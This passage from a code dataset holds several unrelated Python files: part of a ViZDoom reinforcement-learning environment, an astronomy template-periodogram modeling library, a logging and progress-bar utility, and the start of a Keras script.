game.set_screen_format(vzd.ScreenFormat.GRAY8)\n # game.set_screen_format(vzd.ScreenFormat.RGB24)\n game.set_screen_resolution(vzd.ScreenResolution.RES_640X480)\n game.init()\n return game\n\n def reset(self):\n self.game.new_episode()\n self.last_state = None\n self.last2n_state = None\n self.last3r_state = None\n\n state, done, info = self._get_observation()\n\n self.reward = Rewards(self.game)\n return state\n\n def render(self, mode='human'):\n pass\n\n def preprocess(self, img):\n shape = np.asarray(img)\n img = img[150:350, 100:500]\n # saveim(img)\n img = skimage.transform.resize(img, self.resolution)\n img = img.astype(np.float32)\n img = np.expand_dims(img, axis=2)\n return img\n\n def _get_observation(self):\n done = False\n if self.game.is_episode_finished():\n done = True\n\n # Gets the state\n state = self.game.get_state()\n obs = None\n if state is None:\n done = True\n else:\n # Which consists of:\n n = state.number\n vars = state.game_variables\n screen_buf = state.screen_buffer\n depth_buf = state.depth_buffer\n labels_buf = state.labels_buffer\n automap_buf = state.automap_buffer\n labels = state.labels\n objects = state.objects\n sectors = state.sectors\n\n # img = im.fromarray(automap_buf, 'RGB')\n # img.show(\"test\")\n obs = self.preprocess(screen_buf)\n if self.last_state is None:\n self.last_state = copy.deepcopy(obs)\n self.last2n_state = copy.deepcopy(obs)\n self.last3r_state = copy.deepcopy(obs)\n\n if obs is None:\n observation = np.concatenate((self.last_state, self.last_state, self.last2n_state, self.last3r_state),\n axis=2)\n # observation = self.last_state\n else:\n # observation = obs\n observation = np.concatenate((obs, self.last_state, self.last2n_state, self.last3r_state), axis=2)\n self.last3r_state = copy.deepcopy(self.last2n_state)\n self.last2n_state = copy.deepcopy(self.last_state)\n self.last_state = copy.deepcopy(obs)\n\n if self.feature == \"cnn\":\n pass\n else:\n observation = np.asarray(observation).flatten()\n\n self.last_state = copy.deepcopy(obs)\n return observation, done, {\"total_reward\": self.game.get_total_reward()}\n\n def step(self, action, wait=False):\n if self.learning_type == \"sac\":\n action = int(action[0])\n if action == len(self.actions):\n action = len(self.actions) - 1\n r = self.game.make_action(self.actions[action].tolist())\n # r = self.game.make_action(self.actions[action])\n\n varibales = self.game.get_available_game_variables()\n reward, info_reward = 
self.reward.get_reward(current_hit=self.game.get_game_variable(varibales[0].HITS_TAKEN),\n current_hitmon=self.game.get_game_variable(varibales[0].HITCOUNT),\n current_kill=self.game.get_game_variable(varibales[0].KILLCOUNT),\n current_health=self.game.get_game_variable(varibales[0].HEALTH),\n death=self.game.get_game_variable(varibales[0].DEAD),\n others=r)\n if self.sleep_time > 0 and wait:\n sleep(self.sleep_time)\n\n if self.debug:\n print(\"action: {}\".format(action))\n print(info_reward)\n\n state, done, info = self._get_observation()\n # test_state(state)\n return state, r, done, info\n\n def debug_run(self, total_time=1e10):\n start = time()\n while time() - start < total_time:\n key = self.keyboard.get_single_key(None)\n if key is not None and key < len(self.actions):\n state, reward, done, info = self.step(key, wait=True)\n\n def __del__(self):\n self.game.close()\n\n\nimport scipy.misc\ndef test_state(state):\n im0 = state[:, :, 0]\n im1 = state[:, :, 1]\n im2 = state[:, :, 2]\n im3 = state[:, :, 3]\n\n scipy.misc.imsave(\"./im0.jpg\", np.asarray(im0))\n scipy.misc.imsave(\"./im1.jpg\", np.asarray(im1))\n scipy.misc.imsave(\"./im2.jpg\", np.asarray(im2))\n scipy.misc.imsave(\"./im3.jpg\", np.asarray(im3))\n\n\ndef saveim(im):\n scipy.misc.imsave(\"./test.jpg\", np.asarray(im))\n\n\nif __name__ == \"__main__\":\n config_dir = \"./scenarios/basic.cfg\"\n doom = DoomEnv(env_index=1, display=True, debug=False, learning_type=\"no\")\n doom.reset()\n # doom = SimpleDoomEnv(config_dir=config_dir)\n done = False\n while not done:\n doom.step(0)\n # doom = DoomEnv(env_index=1, display=True, debug=True, learning_type=\"no\")\n # doom.debug_run(1e10)\n\n# class SimpleDoomEnv(gym.Env):\n# def __init__(self,\n# config_dir: str = \"./scenarios/basic.wad\",\n# display: bool = False,\n# total_time: int = 200):\n# self.game = vzd.DoomGame()\n# self._init_game(config_dir=config_dir, display=display, total_time=total_time)\n#\n# # Define some actions. Each list entry corresponds to declared buttons:\n# # MOVE_LEFT, MOVE_RIGHT, ATTACK\n# # game.get_available_buttons_size() can be used to check the number of available buttons.\n# # 5 more combinations are naturally possible but only 3 are included for transparency when watching.\n# self.actions = [[True, False, False], [False, True, False], [False, False, True]]\n#\n# # Sets time that will pause the engine after each action (in seconds)\n# # Without this everything would go too fast for you to keep track of what's happening.\n# self.sleep_time = 1.0 / vzd.DEFAULT_TICRATE # = 0.028\n#\n# self.observation_space = spaces.Box(low=0, high=255, dtype=np.uint8, shape=(128,))\n# self.action_space = spaces.Discrete(len(self.actions))\n#\n# def _init_game(self, config_dir, display, total_time):\n# self.game.set_doom_scenario_path(config_dir)\n#\n# # Sets map to start (scenario .wad files can contain many maps).\n# self.game.set_doom_map(\"map01\")\n#\n# # Sets resolution. Default is 320X240, RES_640X480\n# self.game.set_screen_resolution(vzd.ScreenResolution.RES_640X480)\n#\n# # Sets the screen buffer format. Not used here but now you can change it. 
Default is CRCGCB.\n# self.game.set_screen_format(vzd.ScreenFormat.RGB24)\n#\n# # Enables depth buffer.\n# self.game.set_depth_buffer_enabled(True)\n#\n# # Enables labeling of in game objects labeling.\n# self.game.set_labels_buffer_enabled(True)\n#\n# # Enables buffer with top down map of the current episode/level.\n# self.game.set_automap_buffer_enabled(True)\n#\n# # Enables information about all objects present in the current episode/level.\n# self.game.set_objects_info_enabled(True)\n#\n# # Enables information about all sectors (map layout).\n# self.game.set_sectors_info_enabled(True)\n#\n# if display:\n# self._init_render()\n#\n# # Adds buttons that will be allowed.\n# self.game.add_available_button(vzd.Button.MOVE_LEFT)\n# self.game.add_available_button(vzd.Button.MOVE_RIGHT)\n# self.game.add_available_button(vzd.Button.ATTACK)\n#\n# # Adds game variables that will be included in state.\n# self.game.add_available_game_variable(vzd.GameVariable.AMMO2)\n#\n# # Causes episodes to finish after 200 tics (actions)\n# self.game.set_episode_timeout(total_time)\n#\n# # Makes episodes start after 10 tics (~after raising the weapon)\n# self.game.set_episode_start_time(10)\n#\n# # Sets the living reward (for each move) to -1\n# self.game.set_living_reward(-1)\n#\n# # Sets ViZDoom mode (PLAYER, ASYNC_PLAYER, SPECTATOR, ASYNC_SPECTATOR, PLAYER mode is default)\n# self.game.set_mode(vzd.Mode.PLAYER)\n#\n# # Enables engine output to console.\n# # game.set_console_enabled(True)\n#\n# # Initialize the game. Further configuration won't take any effect from now on.\n# self.game.init()\n#\n# def reset(self):\n# self.game.new_episode()\n# state, done, info = self._get_observation()\n# return state\n#\n# def _init_render(self):\n# # Sets other rendering options (all of these options except crosshair are enabled (set to True) by default)\n# self.game.set_render_hud(False)\n# self.game.set_render_minimal_hud(False) # If hud is enabled\n# self.game.set_render_crosshair(False)\n# self.game.set_render_weapon(True)\n# self.game.set_render_decals(False) # Bullet holes and blood on the walls\n# self.game.set_render_particles(False)\n# self.game.set_render_effects_sprites(False) # Smoke and blood\n# self.game.set_render_messages(False) # In-game messages\n# self.game.set_render_corpses(False)\n# self.game.set_render_screen_flashes(True) # Effect upon taking damage or picking up items\n#\n# # Makes the window appear (turned on by default)\n# self.game.set_window_visible(True)\n# # Turns on the sound. 
(turned off by default)\n# # game.set_sound_enabled(True)\n#\n# def render(self, mode='human'):\n# pass\n#\n# def _get_observation(self):\n# done = False\n# if self.game.is_episode_finished():\n# done = True\n#\n# # Gets the state\n# state = self.game.get_state()\n# if state is None:\n# done = True\n# # Which consists of:\n# n = state.number\n# vars = state.game_variables\n# screen_buf = state.screen_buffer\n# depth_buf = state.depth_buffer\n# labels_buf = state.labels_buffer\n# automap_buf = state.automap_buffer\n# labels = state.labels\n# objects = state.objects\n# sectors = state.sectors\n#\n# # img = im.fromarray(automap_buf, 'RGB')\n# # img.show(\"test\")\n# return state, done, {\"total_reward\": self.game.get_total_reward()}\n#\n# def step(self, action: int):\n# r = self.game.make_action(self.actions[action])\n#\n# if self.sleep_time > 0:\n# sleep(self.sleep_time)\n#\n# state, done, info = self._get_observation()\n# return state, r, done, info\n#\n# def __del__(self):\n# self.game.close()\n","sub_path":"DoomEnv.py","file_name":"DoomEnv.py","file_ext":"py","file_size_in_byte":14330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"552089788","text":"from __future__ import print_function\n\nfrom functools import wraps\n\nimport numpy as np\nfrom scipy import optimize\n\nfrom .utils import weights, ModelFitParams\nfrom .template import Template\nfrom . import core as pdg\n\n\n# function wrappers for performing checks\ndef requires_templates(func):\n @wraps(func)\n def wrap(self, *args, **kwargs):\n self._validate_templates()\n return func(self, *args, **kwargs)\n return wrap\n\n\ndef requires_template(func):\n @wraps(func)\n def wrap(self, *args, **kwargs):\n self._validate_template()\n return func(self, *args, **kwargs)\n return wrap\n\n\ndef requires_data(func):\n @wraps(func)\n def wrap(self, *args, **kwargs):\n self._validate_data()\n return func(self, *args, **kwargs)\n return wrap\n\n\ndef power_from_fit(t, y, dy, yfit):\n w = weights(dy)\n ybar = np.dot(w, y)\n\n chi2_0 = np.dot(w, (y-ybar)**2)\n chi2 = np.dot(w, (y-yfit)**2)\n\n return 1. 
- (chi2 / chi2_0)\n\n\nclass TemplateModel(object):\n \"\"\"\n Template for models of the form :math:`a * M(t - tau) + c` for\n some template M.\n\n Parameters\n ----------\n template : Template\n Template for the model\n frequency : float, optional (default = 1.0)\n Frequency of the signal\n parameters : ModelFitParams\n Parameters for the model (a, b, c, sgn); must be a `ModelFitParams`\n instance\n\n Examples\n --------\n >>> params = ModelFitParams(a=1, b=1, c=0, sgn=1)\n >>> template = Template([ 1.0, 0.4, 0.2], [0.1, 0.9, 0.2])\n >>> model = TemplateModel(template, frequency=1.0, parameters=params)\n >>> t = np.linspace(0, 10, 100)\n >>> y_fit = model(t)\n \"\"\"\n def __init__(self, template, frequency=1.0, parameters=None):\n self.template = template\n self.frequency = frequency\n self.parameters = parameters\n\n def _validate(self):\n if not isinstance(self.template, Template):\n raise TypeError(\"template must be a Template instance\")\n if not isinstance(self.parameters, ModelFitParams):\n raise TypeError(\"parameters must be ModelFitParams instance (type = {0}\".format(type(self.parameters)))\n\n def __call__(self, t):\n self._validate()\n\n wtau = np.arccos(self.parameters.b)\n if self.parameters.sgn == -1:\n wtau = 2 * np.pi - wtau\n\n tau = wtau / (2 * np.pi * self.frequency)\n phase = (self.frequency * (t - tau)) % 1.0\n\n return self.parameters.a * self.template(phase) + self.parameters.c\n\n\nclass FastTemplatePeriodogram(object):\n \"\"\"Base class for template periodogram instances\n\n Fits a single template to the data. For\n fitting multiple templates, use the FastMultiTemplatePeriodogram\n\n Parameters\n ----------\n template : Template\n Template to fit (must be Template instance)\n allow_negative_amplitudes : bool (optional, default=True)\n if False, then negative optimal template amplitudes\n will be replaced with zero-amplitude solutions. 
A False\n value prevents the modeler from fitting an inverted\n template to the data, but does not attempt to find the\n best positive amplitude solution, which would require\n substantially more computational resources.\n \"\"\"\n def __init__(self, template=None, allow_negative_amplitudes=True):\n self.template = template\n self.allow_negative_amplitudes = allow_negative_amplitudes\n self.t, self.y, self.dy = None, None, None\n self.best_model = None\n\n def _validate_template(self):\n if self.template is None:\n raise ValueError(\"No template set.\")\n if not isinstance(self.template, Template):\n raise ValueError(\"template is not a Template instance.\")\n\n #self.template.precompute()\n\n def _validate_data(self):\n if any([ X is None for X in [ self.t, self.y, self.dy ] ]):\n raise ValueError(\"One or more of t, y, dy is None; \"\n \"fit(t, y, dy) must be called first.\")\n inds = np.arange(len(self.t) - 1)\n if any(self.t[inds] > self.t[inds+1]):\n raise ValueError(\"One or more observations are not consecutive.\")\n\n if not (len(self.t) == len(self.y) and len(self.y) == len(self.dy)):\n raise ValueError(\"One or more of (t, y, dy) arrays are unequal lengths\")\n\n def _validate_frequencies(self, frequencies):\n raise NotImplementedError()\n\n def fit(self, t, y, dy=None):\n \"\"\"\n Parameters\n ----------\n t: array_like\n sequence of observation times\n y: array_like\n sequence of observations associated with times `t`\n dy: float or array_like (optional, default=None)\n error(s)/uncertaint(ies) associated with observed values `y`.\n If scalar, all observations are weighted equally, which is\n effectively the same as setting `dy=None`.\n\n Returns\n -------\n self : FastTemplatePeriodogram\n Returns self\n \"\"\"\n # TODO: validate dy when it is float or None\n\n self.t = np.array(t)\n self.y = np.array(y)\n self.dy = np.array(dy)\n return self\n\n @requires_data\n @requires_template\n def fit_model(self, freq):\n \"\"\"Fit a template model to data.\n\n y_model(t) = a * template(freq * (t - tau)) + c\n\n Parameters\n ----------\n freq : float\n Frequency at which to fit a template model\n\n Returns\n -------\n model : TemplateModel\n The best-fit model at this frequency\n \"\"\"\n freq = float(freq)\n p, parameters = pdg.fit_template(self.t, self.y, self.dy,\n self.template.c_n, self.template.s_n, freq,\n allow_negative_amplitudes=self.allow_negative_amplitudes)\n return TemplateModel(self.template, parameters=parameters,\n frequency=freq)\n\n @requires_data\n def autofrequency(self, nyquist_factor=5, samples_per_peak=5,\n minimum_frequency=None, maximum_frequency = None):\n \"\"\"\n Determine a suitable frequency grid for data.\n\n Note that this assumes the peak width is driven by the observational\n baseline, which is generally a good assumption when the baseline is\n much larger than the oscillation period.\n If you are searching for periods longer than the baseline of your\n observations, this may not perform well.\n\n Even with a large baseline, be aware that the maximum frequency\n returned is based on the concept of \"average Nyquist frequency\", which\n may not be useful for irregularly-sampled data. 
The maximum frequency\n        can be adjusted via the nyquist_factor argument, or through the\n        maximum_frequency argument.\n\n        Parameters\n        ----------\n        samples_per_peak : float (optional, default=5)\n            The approximate number of desired samples across the typical peak\n        nyquist_factor : float (optional, default=5)\n            The multiple of the average nyquist frequency used to choose the\n            maximum frequency if maximum_frequency is not provided.\n        minimum_frequency : float (optional)\n            If specified, then use this minimum frequency rather than one\n            chosen based on the size of the baseline.\n        maximum_frequency : float (optional)\n            If specified, then use this maximum frequency rather than one\n            chosen based on the average nyquist frequency.\n\n        Returns\n        -------\n        frequency : ndarray or Quantity\n            The heuristically-determined optimal frequency bins\n        \"\"\"\n        baseline = self.t.max() - self.t.min()\n        n_samples = self.t.size\n\n        df = 1. / (baseline * samples_per_peak)\n\n        if minimum_frequency is not None:\n            nf0 = min([1, np.floor(minimum_frequency / df)])\n        else:\n            nf0 = 1\n\n        if maximum_frequency is not None:\n            Nf = int(np.ceil(maximum_frequency / df - nf0))\n        else:\n            Nf = int(0.5 * samples_per_peak * nyquist_factor * n_samples)\n\n        return df * (nf0 + np.arange(Nf))\n\n    @requires_data\n    @requires_template\n    def autopower(self, save_best_model=True, fast=True, **kwargs):\n        \"\"\"\n        Compute template periodogram at automatically-determined frequencies\n\n        Parameters\n        ----------\n        save_best_model : optional, bool (default = True)\n            Save a TemplateModel instance corresponding to the best-fit model found\n        **kwargs : optional, dict\n            Passed to `autofrequency`\n\n        Returns\n        -------\n        frequency, power : ndarray, ndarray\n            The frequency and template periodogram power\n        \"\"\"\n        frequency = self.autofrequency(**kwargs)\n        p, bfpars = pdg.template_periodogram(self.t, self.y, self.dy, self.template.c_n,\n                                             self.template.s_n, frequency, fast=fast,\n                                             allow_negative_amplitudes=self.allow_negative_amplitudes)\n\n        if save_best_model:\n            i = np.argmax(p)\n            self._save_best_model(TemplateModel(self.template,\n                                                frequency=frequency[i],\n                                                parameters=bfpars[i]))\n        return frequency, p\n\n    @requires_data\n    @requires_template\n    def power(self, frequency, save_best_model=True):\n        \"\"\"\n        Compute template periodogram at a given set of frequencies; slower than\n        `autopower`, but frequencies are not restricted to being evenly spaced\n\n        Parameters\n        ----------\n        frequency : float or array_like\n            Frequenc(ies) at which to determine template periodogram power\n        save_best_model : optional, bool (default=True)\n            Save best model fit, accessible via the `best_model` attribute\n\n        Returns\n        -------\n        power : float or ndarray\n            The template periodogram power at each input frequency\n        \"\"\"\n        # Allow inputs of any shape; we'll reshape output to match\n        frequency = np.asarray(frequency)\n        shape = frequency.shape\n        frequency = frequency.ravel()\n\n        def fitter(freq):\n            return pdg.fit_template(self.t, self.y, self.dy,\n                                    self.template.c_n, self.template.s_n, freq,\n                                    allow_negative_amplitudes=self.allow_negative_amplitudes)\n\n        p, bfpars = zip(*map(fitter, frequency))\n        p = np.array(p)\n\n        if save_best_model:\n            i = np.argmax(p)\n            best_model = TemplateModel(self.template,\n                                       frequency=frequency[i],\n                                       parameters=bfpars[i])\n            self._save_best_model(best_model)\n\n        return p.reshape(shape)\n
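\n    # Usage sketch (illustrative comment; `t`, `y`, `dy` stand for observation\n    # arrays that are assumed here, not defined in this module):\n    # >>> tmpl = Template([1.0, 0.4, 0.2], [0.1, 0.9, 0.2])\n    # >>> ftp = FastTemplatePeriodogram(template=tmpl).fit(t, y, dy)\n    # >>> freqs, p = ftp.autopower(samples_per_peak=5)\n    # >>> y_fit = ftp.best_model(t)  # evaluate the saved best-fit model\n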
\n    def _save_best_model(self, model, overwrite=False):\n        if overwrite or self.best_model is None:\n            self.best_model = model\n        else:\n            # if there is an existing best model, replace\n            # with new best model only if new model improves fit\n            y_fit = model(self.t)\n            y_best = self.best_model(self.t)\n\n            p_fit = power_from_fit(self.t, self.y, self.dy, y_fit)\n            p_best = power_from_fit(self.t, self.y, self.dy, y_best)\n\n            if p_fit > p_best:\n                self.best_model = model\n\n\nclass FastMultiTemplatePeriodogram(FastTemplatePeriodogram):\n    \"\"\"\n    Template modeler that fits multiple templates\n\n    Parameters\n    ----------\n    templates : list of Template\n        Templates to fit (must be list of Template instances)\n    allow_negative_amplitudes : bool (optional, default=True)\n        if False, then negative optimal template amplitudes\n        will be replaced with zero-amplitude solutions. A False\n        value prevents the modeler from fitting an inverted\n        template to the data, but does not attempt to find the\n        best positive amplitude solution, which would require\n        substantially more computational resources.\n    \"\"\"\n    def __init__(self, templates=None, allow_negative_amplitudes=True):\n        self.templates = templates\n        self.allow_negative_amplitudes = allow_negative_amplitudes\n        self.t, self.y, self.dy = None, None, None\n        self.best_model = None\n\n    def _validate_templates(self):\n        if self.templates is None:\n            raise ValueError(\"No templates set.\")\n        if not hasattr(self.templates, '__iter__'):\n            raise ValueError(\".templates must be iterable.\")\n        if len(self.templates) == 0:\n            raise ValueError(\"No templates.\")\n        for template in self.templates:\n            if not isinstance(template, Template):\n                raise ValueError(\"One or more templates are not Template instances.\")\n            #template.precompute()\n\n    @requires_data\n    @requires_templates\n    def fit_model(self, freq):\n        \"\"\"Fit a template model to data.\n\n        y_model(t) = a * template(freq * (t - tau)) + c\n\n        Parameters\n        ----------\n        freq : float\n            Frequency at which to fit a template model\n\n        Returns\n        -------\n        model : TemplateModel\n            The best-fit model at this frequency\n        \"\"\"\n        if not isinstance(freq, (float, np.floating)):\n            raise ValueError('fit_model requires float argument')\n\n        p, parameters = zip(*[pdg.fit_template(self.t, self.y, self.dy,\n                                               template.c_n, template.s_n, freq,\n                                               allow_negative_amplitudes=self.allow_negative_amplitudes)\n                              for template in self.templates])\n\n        i = np.argmax(p)\n        params = parameters[i]\n        template = self.templates[i]\n\n        return TemplateModel(template, parameters=params, frequency=freq)\n\n    @requires_data\n    @requires_templates\n    def autopower(self, save_best_model=True, fast=True, **kwargs):\n        \"\"\"\n        Compute template periodogram at automatically-determined frequencies\n\n        Parameters\n        ----------\n        save_best_model : optional, bool (default = True)\n            Save a TemplateModel instance corresponding to the best-fit model found\n        **kwargs : optional, dict\n            Passed to `autofrequency`\n\n        Returns\n        -------\n        frequency, power : ndarray, ndarray\n            The frequency and template periodogram power\n        \"\"\"\n        frequency = self.autofrequency(**kwargs)\n\n        results = [pdg.template_periodogram(self.t, self.y, self.dy, template.c_n,\n                                            template.s_n, frequency, fast=fast,\n                                            allow_negative_amplitudes=self.allow_negative_amplitudes)\n                   for template in self.templates]\n\n        p, bfpars = zip(*results)\n        if save_best_model:\n            maxes = [max(P) for P in p]\n\n            i = np.argmax(maxes)\n            j = np.argmax(p[i])\n\n            self._save_best_model(TemplateModel(self.templates[i],\n                                                frequency=frequency[j],\n                                                parameters=bfpars[i][j]))\n\n        return frequency, np.max(p, axis=0)\n
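\n    # Note (illustrative comment): the multi-template power is the elementwise\n    # maximum over the per-template powers (see `power` below), so a hypothetical\n    # two-template session looks like:\n    # >>> mftp = FastMultiTemplatePeriodogram(templates=[tmpl_a, tmpl_b]).fit(t, y, dy)\n    # >>> freqs, p = mftp.autopower()  # p[k] = max over templates at freqs[k]\n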
\n    @requires_data\n    def power_from_single_template(self, frequency, template, fast=False, save_best_model=True):\n        \"\"\"\n        Compute template periodogram for a single template at a given set of\n        frequencies; slower than `autopower`, but frequencies are not\n        restricted to being evenly spaced\n\n        Parameters\n        ----------\n        frequency : float or array_like\n            Frequenc(ies) at which to determine template periodogram power\n        template : Template\n            Template to fit at these frequencies\n        save_best_model : optional, bool (default=True)\n            Save best model fit, accessible via the `best_model` attribute\n\n        Returns\n        -------\n        power : float or ndarray\n            The template periodogram power at each input frequency\n        \"\"\"\n        # Allow inputs of any shape; we'll reshape output to match\n        frequency = np.asarray(frequency)\n        shape = frequency.shape\n        frequency = frequency.ravel()\n\n        p, bfpars = pdg.template_periodogram(self.t, self.y, self.dy,\n                                             template.c_n, template.s_n,\n                                             frequency,\n                                             fast=fast,\n                                             allow_negative_amplitudes=self.allow_negative_amplitudes)\n        p = np.asarray(p)\n        if save_best_model:\n            i = np.argmax(p)\n            best_model = TemplateModel(template, frequency=frequency[i],\n                                       parameters=bfpars[i])\n            self._save_best_model(best_model)\n\n        return p.reshape(shape)\n\n    @requires_data\n    @requires_templates\n    def power(self, frequency, save_best_model=True, fast=False):\n        \"\"\"\n        Compute template periodogram at a given set of frequencies\n\n        Parameters\n        ----------\n        frequency : float or array_like\n            Frequenc(ies) at which to determine template periodogram power\n        save_best_model : optional, bool (default=True)\n            Save best model fit, accessible via the `best_model` attribute\n\n        Returns\n        -------\n        power : float or ndarray\n            The template periodogram power at each input frequency,\n            maximized over templates\n        \"\"\"\n        all_power = [self.power_from_single_template(frequency, template,\n                                                     fast=fast,\n                                                     save_best_model=save_best_model)\n                     for template in self.templates]\n\n        return np.max(all_power, axis=0)\n\n\nclass SlowTemplatePeriodogram(object):\n    \"\"\"Slow periodogram built from a template model.\n\n    When computing the periodogram, this performs a nonlinear optimization at\n    each frequency. 
This is used mainly for testing the faster method\n    available in FastTemplatePeriodogram\n\n    Parameters\n    ----------\n    template : Template object\n        callable object that returns the template value as a function of phase\n    nguesses : int, optional (default: 10)\n        number of initial guesses for the phase shift parameter (to avoid local minima)\n    \"\"\"\n    # TODO: match the full API of FastTemplateModeler.\n    # Perhaps factor-out common routines into a base class?\n\n    def __init__(self, template=None, nguesses=10):\n        self.template = template\n        self.nguesses = nguesses\n\n    def fit(self, t, y, dy=None):\n        \"\"\"Fit periodogram to given data\n\n        Parameters\n        ----------\n        t : array_like\n            sequence of observation times\n        y : array_like\n            sequence of observations associated with times t\n        dy : float, array_like (optional)\n            error or sequence of observational errors associated with times t\n        \"\"\"\n        self.t, self.y, self.dy = self._validate_inputs(t, y, dy)\n        return self\n\n    def _validate_inputs(self, t, y, dy):\n        if dy is None:\n            # TODO: handle dy = None case more efficiently\n            t, y, dy = np.broadcast_arrays(t, y, 1.0)\n        else:\n            t, y, dy = np.broadcast_arrays(t, y, dy)\n        if t.ndim != 1:\n            raise ValueError(\"Inputs (t, y, dy) must be 1-dimensional\")\n        return t, y, dy\n\n    def _chi2_ref(self):\n        \"\"\"Compute the reference chi-square\"\"\"\n        weights = self.dy ** -2\n        weights /= weights.sum()\n        ymean = np.dot(weights, self.y)\n        return np.sum((self.y - ymean) ** 2 / self.dy ** 2)\n\n    def _minimize_chi2_at_single_freq(self, freq, nguesses=None):\n        # at each phase, use a linear model to find best [offset, amplitude]\n        # and then minimize this scalar function of phase\n        def chi2(phase):\n            shifted = self.template(self.t * freq - phase)\n            X = np.vstack([np.ones_like(shifted), shifted]).T\n            offset, amp = np.linalg.solve(np.dot(X.T, X),\n                                          np.dot(X.T, self.y))\n            y_model = offset + amp * shifted\n            return np.sum((self.y - y_model) ** 2 / self.dy ** 2)\n\n        nguesses = nguesses if nguesses is not None else self.nguesses\n\n        # User can opt to run minimize_scalar (faster)\n        if nguesses is None:\n            return optimize.minimize_scalar(chi2, bounds=(0, 1), method='bounded')\n\n        # initial guesses for phase shift\n        guesses = np.random.rand(nguesses)\n\n        local_minimum = lambda x0: optimize.minimize(chi2, x0, bounds=[(0, 1)])\n\n        # get solutions for each initial guess\n        local_minima = [local_minimum(guess) for guess in guesses]\n\n        local_minima = [res for res in local_minima if res.success]\n\n        if len(local_minima) == 0:\n            return optimize.minimize_scalar(chi2, bounds=(0, 1), method='bounded')\n\n        # return the best one\n        return local_minima[np.argmin([res.fun for res in local_minima])]\n\n    def power(self, freq):\n        \"\"\"Compute a template-based periodogram at the given frequencies\n\n        Parameters\n        ----------\n        freq : array_like\n            frequencies at which to evaluate the template periodogram\n\n        Returns\n        -------\n        power : np.ndarray\n            normalized power spectrum computed at the given frequencies\n        \"\"\"\n        freq = np.asarray(freq)\n        results = list(map(self._minimize_chi2_at_single_freq, freq.flat))\n        failures = sum([not res.success for res in results])\n        if failures:\n            raise RuntimeError(\"{0}/{1} frequency values failed to converge\"\n                               \"\".format(failures, freq.size))\n        chi2 = np.array([res.fun for res in results])\n        return np.reshape(1 - chi2 / self._chi2_ref(), freq.shape)\n
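\n# Cross-check sketch (illustrative comment; `tmpl`, `t`, `y`, `dy` are assumed\n# inputs): SlowTemplatePeriodogram exists mainly to validate the fast modelers\n# above, so on a common frequency grid the two should agree to within optimizer\n# tolerance:\n# >>> fast = FastTemplatePeriodogram(template=tmpl).fit(t, y, dy)\n# >>> freqs = fast.autofrequency()\n# >>> p_fast = fast.power(freqs)\n# >>> p_slow = SlowTemplatePeriodogram(template=tmpl).fit(t, y, dy).power(freqs)\n# >>> # np.allclose(p_fast, p_slow, atol=1e-2)  # tolerance here is a guess\n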
","sub_path":"ftperiodogram/modeler.py","file_name":"modeler.py","file_ext":"py","file_size_in_byte":22257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"38975079","text":"import tensorflow as tf\nimport os\nimport numpy as np\nimport logging\nimport time\nimport sys\n\ndef logging_file(filename):\n    logger = logging.getLogger('logger')\n    logger.setLevel(logging.DEBUG)\n    logging.basicConfig(format='%(message)s', level=logging.DEBUG)\n    handler = logging.FileHandler(filename)\n    handler.setLevel(logging.DEBUG)\n    handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))\n    logging.getLogger().addHandler(handler)\n    return logger\n\nclass Progress(object):\n    def __init__(self, target, width=30, verbose=1):\n        self.width = width\n        self.target = target\n        self.verbose = verbose\n        self.sum_value = {}\n        self.unique_value = []\n        self.start = time.time()\n        self.total_width = 0\n        self.seen_so_far = 0\n\n    def update(self, current, value=[], exact=[], strict=[]):\n        for k, v in value:\n            if k not in self.sum_value:\n                self.sum_value[k] = [v*(current - self.seen_so_far), current - self.seen_so_far]\n                self.unique_value.append(k)\n            else:\n                self.sum_value[k][0] += v*(current - self.seen_so_far)\n                self.sum_value[k][1] += (current - self.seen_so_far)\n\n        for k, v in exact:\n            if k not in self.sum_value:\n                self.unique_value.append(k)\n            self.sum_value[k] = v\n\n        self.seen_so_far = current\n\n        now = time.time()\n\n        if self.verbose == 1:\n            prev_total_width = self.total_width\n            sys.stdout.write(\"\\b\" * prev_total_width)\n            sys.stdout.write(\"\\r\")\n\n            num_digit = int(np.floor(np.log10(self.target))) + 1\n            string_bar = '%%%dd/%%%dd [' % (num_digit, num_digit)\n            bar = string_bar % (current, self.target)\n            prog = float(current) / self.target\n            prog_width = int(self.width*prog)\n            if prog_width > 0:\n                bar += ('='*(prog_width-1))\n                if current < self.target:\n                    bar += '>'\n                else:\n                    bar += '='\n            bar += ('.'*(self.width-prog_width))\n            bar += ']'\n            sys.stdout.write(bar)\n            self.total_width = len(bar)\n\n            if current:\n                time_per_unit = (now - self.start) / current\n            else:\n                time_per_unit = 0\n            eta = time_per_unit*(self.target - current)\n            info = ''\n            if current < self.target:\n                info += ' -ETA: %ds '%eta\n            else:\n                info += ' -%ds' %(now - self.start)\n\n            for k in self.unique_value:\n                if type(self.sum_value[k]) is list:\n                    info += ' -%s: %.4f ' %(k, self.sum_value[k][0] / max(1, self.sum_value[k][1]))\n                else:\n                    info += ' -%s: %s ' %(k, self.sum_value[k])\n\n            self.total_width += len(info)\n\n            if prev_total_width > self.total_width:\n                info += ((prev_total_width-self.total_width)*\" \")\n            sys.stdout.write(info)\n            sys.stdout.flush()\n\n            if current > self.target:\n                sys.stdout.write(\"\\n\")\n\n        if self.verbose == 2:\n            if current >= self.target:\n                info = '%ds' %(now-self.start)\n\n                for k in self.unique_value:\n                    info += '- %s: %.4f' %(k, self.sum_value[k][0] / max(1, self.sum_value[k][1]))\n\n                sys.stdout.write(info + \"\\n\")\n\n    def add(self, n, value=[]):\n        self.update(self.seen_so_far+n, value)\n","sub_path":"model/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"421849780","text":"from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, 
